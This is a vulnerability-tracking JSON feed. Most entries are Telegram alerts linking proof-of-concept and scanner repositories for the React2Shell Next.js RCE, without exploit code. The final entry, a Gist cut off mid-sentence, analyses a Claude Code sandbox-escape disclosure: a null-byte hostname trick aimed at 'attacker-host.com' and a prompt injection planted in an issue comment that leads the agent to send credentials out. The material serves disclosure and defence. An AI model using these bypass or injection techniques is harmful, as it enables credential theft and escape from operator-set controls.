"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61680", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aBurp Suite extension to detect the Next.js / React Server Components (RSC) Remote Code Execution vulnerability (CVE-2025-55182 & CVE-2025-66478).\nURL\uff1ahttps://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension-\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-04T19:43:05.000000Z"}, {"uuid": "c9cda45c-f118-48a8-9d55-0fae54634c69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/XWTA61aLxeuTC5sHiWikV_egsW2o5SPz4gzRMuJJqmgQaKA", "content": "", "creation_timestamp": "2025-12-26T03:00:07.000000Z"}, {"uuid": "418ba408-4b83-4b26-9c53-df8b75c5db7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61912", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-55182 & CVE-2025-66478 proof of concepts\nURL\uff1ahttps://github.com/ayoub-intigriti/react2shell-cve\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T13:04:01.000000Z"}, {"uuid": "c7d76955-d6cd-47d8-ac3d-01ac382a98bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61899", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aMass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/sumanrox/rschunter\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T09:40:33.000000Z"}, {"uuid": "5029fefd-0a7c-46de-b827-83df8ed79d93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61848", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aRSC/Next.js RCE Vulnerability Detector & PoC Chrome Extension \u2013 CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/emredavut/CVE-2025-55182\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T01:22:36.000000Z"}, {"uuid": "c3e1f86d-f750-4099-8a37-a89dc79b3868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61520", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aScript to quick check CVE-2025-55182 (React) and CVE-2025-66478 (Next.js)  - Critical unauthenticated RCE vulnerabilities in the React Server Components (RSC) \u201cFlight\u201d protocol.\nURL\uff1ahttps://github.com/BankkRoll/Quickcheck-CVE-2025-55182-React-and-CVE-2025-66478-Next.js-\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-03T17:23:38.000000Z"}, {"uuid": "99ab779b-0980-4c15-bf15-d4ebeaa41e31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/p1kctDWMPjRH9UHDphPObPnl4Jga04s8GR_gza3noeTXcn4", "content": "", "creation_timestamp": "2025-12-04T15:00:08.000000Z"}, {"uuid": "86969b1c-5402-4c5a-a9d0-3d63bdb4b66b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/LcY7eBFwAwyzwe0Kauf_IGSBHQfjWzlBSbPNDVNgDN2U1XQ", "content": "", "creation_timestamp": "2025-12-08T15:00:08.000000Z"}, {"uuid": "7315d7be-570e-498f-8714-1a7bf3dea027", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61695", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aSecurity scanner to detect CVE-2025-55182 & CVE-2025-66478 vulnerabilities in React Server Components (RSC) projects\nURL\uff1ahttps://github.com/ZihxS/check-react-rce-cve-2025-55182\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-05T00:17:49.000000Z"}, {"uuid": "382e6b91-df7c-452a-84d9-348efcbcbe68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61943", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aOne command to fix CVE-2025-66478 (React 2 Shell RCE) in your Next.js / React RSC app.\nURL\uff1ahttps://github.com/L1337Xi/CVE-2024-28397-Exploit-Automation\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-06T16:53:15.000000Z"}, {"uuid": "a3b79f7a-5f58-455e-b704-ebae09c39b0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61941", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aOne command to fix CVE-2025-66478 (React 2 Shell RCE) in your Next.js / React RSC app.\nURL\uff1ahttps://github.com/vercel-labs/fix-react2shell-next\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-06T16:32:09.000000Z"}, {"uuid": "bb50ef65-3c89-44d3-8093-e8662da670bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61839", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aReact2Shell vulnerability (CVE-2025-55182 / CVE-2025-66478)\nURL\uff1ahttps://github.com/pax-k/react2shell-CVE-2025-55182-full-rce-script\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-05T22:22:16.000000Z"}, {"uuid": "3ed4fd65-3ff9-4551-a34f-a9671ad73b0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61686", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aChecks if your NextJS server is vulnerable to CVE-2025-66478\nURL\uff1ahttps://github.com/mattcbarrett/check-cve-2025-66478\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T20:55:40.000000Z"}, {"uuid": "b9dd927d-93b6-4306-97a5-ce2a0561ec36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61667", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aDeliberately vulnerable banking app for CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) to learn, detect, and safely exercise React2Shell. Runs unpatched React 19.0.0 and Next.js 15.0.3.\nURL\uff1ahttps://github.com/jctommasi/react2shellVulnApp\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T15:45:48.000000Z"}, {"uuid": "5c4ae3bc-cfd9-4d40-804e-68beb9f1231c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61614", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aReact2Shell Scanner & Guardrail Suite for CVE-2025-55182 in React.js and  CVE-2025-66478  for the Next.js framework\nURL\uff1ahttps://github.com/gensecaihq/react2shell-scanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T09:52:01.000000Z"}, {"uuid": "81f74596-5322-41e8-87d8-84c44cabb997", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61584", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1a\u6f0f\u6d1e\u5229\u7528\n\u63cf\u8ff0\uff1aCVE-2025-55182 \u6f0f\u6d1e\u5229\u7528GUI,PoC / Exploit for CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/songsanggggg/CVE-2025-55182\n\n\u6807\u7b7e\uff1a#\u6f0f\u6d1e\u5229\u7528", "creation_timestamp": "2025-12-04T06:51:27.000000Z"}, {"uuid": "e4dbee53-bf1e-4dcc-a283-b1a34e25f6c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61639", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA command-line scanner for batch detection of Next.js application versions and determining if they are affected by CVE-2025-66478 vulnerability.\nURL\uff1ahttps://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-04T13:29:26.000000Z"}, {"uuid": "13abfe40-b131-4010-8aa1-35a7c4e0673a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61587", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aHigh Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478)\nURL\uff1ahttps://github.com/assetnote/react2shell-scanner\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-04T07:32:57.000000Z"}, {"uuid": "71c7136a-5f54-41bf-a377-061cdd1a820d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mjoxczihdu2i", "content": "", "creation_timestamp": "2026-04-17T12:45:14.264726Z"}, {"uuid": "991ded5f-8ac7-4244-8775-5ec364ee2a95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/tom1sxchannel/102", "content": "RSC/Next.js RCE Vulnerability Detector & PoC Chrome Extension \u2013 CVE-2025-55182 & CVE-2025-66478\n\nhttps://github.com/emredavut/CVE-2025-55182", "creation_timestamp": "2025-12-08T23:01:11.000000Z"}, {"uuid": "90b738c9-a476-433a-ab79-a9c46fc16b55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://t.me/GithubRedTeam/85467", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2025-66478_rce_vulnerable\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Letalandroid\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a TypeScript\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-22 22:57:27\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nIMPORTANTE: Proyecto de Next JS VULNERABLE creado solo para fines educativos, de pruebas y explotaci\u00f3n, NO SE RECOMIENDA INSTALACI\u00d3N EN PRODUCCION, S\u00d3LO PARA \u00c1MBITO LOCAL O ENTORNO CONTROLADO\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-22T23:05:04.000000Z"}, {"uuid": "01b95d12-80a9-4082-bf12-e0f81dcfc73b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6647", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19534", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-6647\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_0, Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: PDF-XChange Editor U3D File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26644.\n\ud83d\udccf Published: 2025-06-25T21:42:55.444Z\n\ud83d\udccf Modified: 2025-06-25T21:42:55.444Z\n\ud83d\udd17 References:\n1. https://www.zerodayinitiative.com/advisories/ZDI-25-432/\n2. https://www.pdf-xchange.com/support/security-bulletins.html", "creation_timestamp": "2025-06-25T21:50:18.000000Z"}, {"uuid": "ab2905b9-4456-41dd-a68c-49e2edc5bdd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/xbXCUJJIXIudZLkQezFFvZDk-YoTt15X3xYywmSJdeUKTNs", "content": "", "creation_timestamp": "2025-12-09T15:00:07.000000Z"}, {"uuid": "95e6c19f-f60a-4963-a13b-fe588f5a67a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/NegsVzhy-uoWOrNQS8hOgBFEx1cqg-pTrASM5TPGmTEG-kw", "content": "", "creation_timestamp": "2025-12-09T09:00:05.000000Z"}, {"uuid": "59bb36de-0012-49aa-8bd4-d131c4bf90b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/wrfudqnzlg5v3NwfdZMWJddTTiTqOv9ZPrFziB48VUSTKnU", "content": "", "creation_timestamp": "2025-12-13T21:00:05.000000Z"}, {"uuid": "6320d48e-4e87-43c0-9fe5-29bb90f778b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62143", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aULTIMATE REACT4SHELL EXPLOITATION FRAMEWORK CVE-2025-55182 & CVE-2025-66478 Ready\nURL\uff1ahttps://github.com/C00LN3T/React2Shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-08T09:13:18.000000Z"}, {"uuid": "9fbe9931-7fe6-4162-b9a9-1a713630f6b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66479", "type": "seen", "source": "https://gist.github.com/yurukusa/a40f9255aec358aba5aa1cb6087d1903", "content": "Claude Code sandbox bypass disclosure (Aonan Guan, 2026-05-20): structural read through the claim-verify framework. ~2,000 words. Operator-side defenses for vendor-side claim-verify gap. Three independent operator-side checks plus the prompt-injection compound that turns the bypass into actual exfiltration.\n\n# Claude Code's Sandbox Was Bypassable for Five and a Half Months. Here's the Structural Read.\n\n**Disclosure context:** On 2026-05-20, security researcher Aonan Guan published [Second Time, Same Sandbox](https://oddguan.com/blog/second-time-same-sandbox-anthropic-claude-code-network-allowlist-bypass-data-exfiltration/). Every Claude Code release from sandbox GA (`v2.0.24`, 2025-10-20) through `v2.1.89` (2026-03-31) was vulnerable to at least one of two independent network-sandbox bypass paths. About 5.5 months. ~130 published versions. Both findings were silently fixed (`v2.0.55` and `v2.1.90`) with no Claude Code security advisory, no changelog flag, no notice to users on the ~130 vulnerable releases.\n\nThis post reads the disclosure through the structural framework operators have been organizing this kind of failure with for the past six weeks, and lists the three independent operator-side checks that would have caught the failure mode regardless of which specific bypass path was live.\n\n**Author's disclosure:** I publish the [Claude Code Claim-Verify Handbook](https://yurukusa.gumroad.com/l/claim-verify-handbook) (ships 2026-05-22). This Gist is a free public-asset analysis of Aonan Guan's disclosure, not a sales page. The book references this disclosure as a vendor-side current evidence axis in its industry recognition section. Free preview (the foreword, the three-stage framework, two representative case chapters, the full table of contents) is at .\n\n## The Two Bypass Paths\n\n**Finding 1 (CVE-2025-66479, recap).** A user who wrote `allowedDomains: []` in `settings.json` \u2014 the most restrictive setting the API offered, documented to mean \"block all outbound traffic\" \u2014 got the most permissive behavior. The check was `allowedDomains.length > 0`. An empty array evaluated to false and silently disabled the proxy. The user said \"allow nothing.\" The implementation heard \"allow everything.\" Silently patched in `v2.0.55` (2025-11-26). The CVE was issued against `sandbox-runtime` on 2025-12-02; Claude Code itself got no CVE, no advisory, no changelog flag, no notice to users.\n\n**Finding 2 (the new one).** A SOCKS5 hostname null-byte injection. The user's policy says allow only `*.google.com`. An attacker who runs code inside the sandbox sends a hostname like `attacker-host.com\\x00.google.com`. The filter sees the trailing `.google.com` and approves; the operating system's `getaddrinfo` resolver truncates the C string at the null byte and dials `attacker-host.com`. The policy approved one host; the resolver dialed another. Silently patched in `v2.1.90` (2026-04-01). No security advisory.\n\nThe compound attack: combine either bypass with a prompt-injection vector (a hidden instruction in a GitHub issue comment that Claude Code reads), and anything inside the sandbox can be sent to any server on the internet. Credentials, source code, environment variables, internal customer data. Even when the user explicitly restricted egress to a strict wildcard allowlist.\n\n## The Three-Stage Framework, Applied to the Vendor Side\n\nOperators reading the `anthropics/claude-code` issue tracker over the past six weeks have been organizing claim-vs-reality failures with a three-stage structural framework:\n\n- **Stage 1 \u2014 Operator intent.** The operator writes something explicit (`settings.json`, `CLAUDE.md`, `/config`, a subagent's frontmatter, a `memory:` directive) describing the constraint they expect the system to enforce.\n- **Stage 2 \u2014 System status claim.** The system reports a status that confirms the constraint is in effect. `/context` says auto-compact is off; the sandbox documentation says `allowedDomains: [\"*.google.com\"]` blocks everything else; the changelog says \"Releasing a sandbox mode for the BashTool.\"\n- **Stage 3 \u2014 Runtime action.** The actual runtime behavior diverges from what the system claimed in Stage 2. The auto-compact fires anyway; the sandbox dials `attacker-host.com`; the deny rule is silently bypassed for a subagent that has no explicit tool binding.\n\nAonan Guan's disclosure is a perfect-fit vendor-side instance of this framework:\n\n- **Stage 1 \u2014 Operator intent.** The operator wrote `allowedDomains: [\"*.google.com\"]` in `settings.json`. The operator's intent: only `.google.com` egress is allowed.\n- **Stage 2 \u2014 System status claim.** The sandbox's documented contract: SOCKS5-mediated egress filtering. The sandbox went GA on 2025-10-20 with the changelog announcement \"Releasing a sandbox mode for the BashTool on Linux & Mac.\" The implication: this thing enforces.\n- **Stage 3 \u2014 Runtime action.** For 5.5 months, the proxy that mediates the egress decision had two independent bypasses live in production. The operator's intent in Stage 1 and the system's claim in Stage 2 both said the constraint was enforced. The runtime action in Stage 3 said otherwise. The divergence ran for ~130 versions before either path was silently patched, and the operator was never notified.\n\nThe same framework that organizes 130 operator-side cases in the `anthropics/claude-code` issue tracker reads the vendor-side sandbox disclosure cleanly. The structural property is symmetric across the operator/vendor boundary: an explicit constraint is written, a status claim says it's in effect, the runtime diverges, and the divergence is only discovered when an outside party tests it.\n\n## Why This Is Not Just a Bug Report\n\nTwo characteristics distinguish this disclosure from a routine vulnerability:\n\n**Symmetry across the operator-vendor boundary.** The same failure mode that operators have been reporting in the issue tracker \u2014 `permissions.deny` silently bypassed, `autocompact: false` ignored, `memory:` directives unreferenced, subagent tool restrictions not inherited \u2014 also occurs at the vendor level when the vendor writes the sandbox contract. The failure mode is not a function of who wrote the constraint. It is a function of whether the contract and the runtime are independently verified.\n\n**Silent fix is itself the structural property.** Both findings were patched without a Claude Code security advisory. No CVE was issued by Anthropic for either. No notice was sent to users on the ~130 vulnerable releases. A team running `allowedDomains: [...]` in production from October 20 through November 26 had no way to know the sandbox was effectively off, and no notice afterwards that it had ever been off. The same \"silent fix\" pattern shows up repeatedly in the operator-side issue tracker: a Claude Code release fixes a deny-rule regression, an auto-compact regression, a memory-directive regression, with the changelog describing it as a feature improvement rather than a security-relevant correction. The operator never gets the signal that re-verification is needed.\n\nThe structural read: the constraint-enforcement contract is treated as a quality-of-life feature on both sides, not as a security boundary that requires re-verification on every version bump.\n\n## Three Operator-Side Checks That Catch This Pattern\n\nRegardless of which specific bypass path is live in any given release, three operator-side checks will catch the structural property \u2014 that the sandbox's claimed enforcement diverges from its runtime enforcement \u2014 within seconds of a new Claude Code version landing on the workstation.\n\n**Check 1: Verify the sandbox out-of-band.** Do not trust the sandbox's claim that egress is restricted. Verify it by trying to reach a blocked host from inside the sandbox and confirming the connection actually fails. The smallest possible test:\n\n```bash\n# Inside a Claude Code session with sandbox enabled and a strict allowlist:\ncurl -m 5 -sSf https://example.com >/dev/null \\\n  && echo \"FAIL: sandbox approved a host the policy should have blocked\" \\\n  || echo \"OK: sandbox blocked\"\n```\n\nRun this on every Claude Code version bump. If `example.com` (or any host outside the allowlist) is reachable, the sandbox is not enforcing what the documentation claims it enforces. This is the only way to catch a Finding-1-style \"allow nothing was read as allow everything\" or a Finding-2-style \"null-byte injection bypasses the wildcard check.\" Both bypasses would fail this test the moment a vulnerable version was installed.\n\n**Check 2: Pin sandbox enforcement at the OS level, not at the JavaScript proxy level.** The OS-level enforcement (`sandbox-exec` on macOS, `bubblewrap` on Linux) correctly pins the agent to localhost in both bypass scenarios. The SOCKS5 proxy that the sandbox delegates egress decisions to runs on the host with full network privileges. Fool the proxy, and the host dials. Run Claude Code under an OS-level sandbox that the JavaScript-layer proxy cannot influence:\n\n```bash\n# macOS: wrap Claude Code in sandbox-exec with a deny-internet profile\nsandbox-exec -f deny-internet.sb claude code\n# Linux: wrap in bubblewrap with --share-net 0\nbwrap --share-net 0 --bind / / claude code\n```\n\nA JavaScript proxy that misinterprets a null byte in a hostname cannot cause the OS to dial a blocked host if the OS itself has no internet route. The OS-level boundary is independent of whatever the JavaScript proxy thinks it is enforcing.\n\n**Check 3: Audit `cli.js` on every version bump for sandbox-related code changes.** Aonan Guan found both bugs by reverse-engineering the bundled `cli.js`. Operators running Claude Code in environments where vendor silence around sandbox patches is unacceptable can do the same. A minimal audit pattern:\n\n```bash\n# Capture the sandbox-related code surface on each version bump:\nwhich claude | xargs -I{} dirname {} | xargs -I{} find {} -name \"cli.js\" \\\n  -exec grep -n \"socks\\|allowedDomains\\|sandbox\\|proxy\" {} \\;\n```\n\nThe audit is not a security review; it is a heuristic for \"did the sandbox-related code surface change since the previous version?\" A diff that touches `socks` parsing or `allowedDomains` evaluation is a signal to re-run Check 1 explicitly and to look at the related issues on the tracker.\n\n## The Compound With Prompt Injection\n\nA bypass alone is just a misconfigured proxy. The bypass becomes an exfiltration vector when combined with prompt injection: a hidden instruction in a GitHub issue comment that Claude Code reads, a CLAUDE.md file in an open-source dependency, a comment in a code review the agent processes. The hidden instruction asks the model to send local credentials to `attacker-host.com\\x00.google.com`. The model emits the command. The sandbox approves it. The host dials the attacker's server. Credentials, source code, environment variables, internal data \u2014 everything inside the sandbox \u2014 flows out through a hostname the user's policy explicitly allowed.\n\nOperator-side mitigations for the prompt-injection compound:\n\n- **Disable agent reading of untrusted content.** If your agent reads issue comments, code review threads, or third-party CLAUDE.md files, treat those inputs as untrusted. Either parse them through a stripping step that removes anything resembling an instruction, or run the agent in a sandbox that has no egress at all (Check 2 above).\n- **Egress allowlists at the OS level, not the application level.** As above. The OS-level allowlist is unaffected by a JavaScript proxy that misinterprets a hostname.\n- **Per-tool secret scoping.** Do not give the agent ambient access to credentials that an exfiltration vector could send out. Scope each secret to the tool that needs it, expose it only at the moment of the tool's invocation, revoke after.\n\n## Where This Fits in the Broader Pattern\n\nThe disclosure is the strongest vendor-side current evidence of a pattern the operator community has been documenting in the `anthropics/claude-code` issue tracker for the past six weeks. The recurring shape: an explicit constraint is written by the operator (or by the vendor in this case); the system reports the constraint is in effect; the runtime diverges; the operator has no signal that re-verification is needed.\n\nA non-exhaustive list of the structural cluster on the operator side: `permissions.deny` regressions silently introduced by version bumps (Issue #57491, #57486 \u2014 the same v2.1.128 that silently changed Allow rule interpretation while the changelog described it as a feature improvement); `autocompact: false` ignored mid-session with `/context` continuing to claim it was off (Issue #57490); subagent tool restrictions not inherited from parent `settings.json` deny rules (Issue #57068); auth state and tool liveness claims diverging from actual state (Issue #57285). The Claim-Verify Handbook ships 2026-05-22 with 130 cases (15 main + 115 appendix D) organized through the three-stage framework, with 14 operator-side defenses against the pattern.\n\nThe vendor-side data point Aonan Guan published is qualitatively distinct: it shows that the same structural failure mode operates at the layer where the vendor writes the contract, with the same characteristic silent fix and missing-advisory tail. The pattern is not \"agents misbehave\" \u2014 it is \"explicit constraints and runtime behavior diverge without a verification mechanism, on both sides of the contract.\"\n\n## Read Before Buy\n\nThe Claim-Verify Handbook's foreword, three-stage framework, industry recognition signal (now twelve independent verification axes including this disclosure), and two full representative case chapters are in the free preview Gist: . Read the framework first. If the structural read above resonates with what you are seeing in your own Claude Code operation, the full handbook organizes 130 cases of the operator-side pattern with mitigations.\n\n**Free user-side prevention work the book references**: the `cc-safe-setup` hook collection (MIT, 750+ hooks, 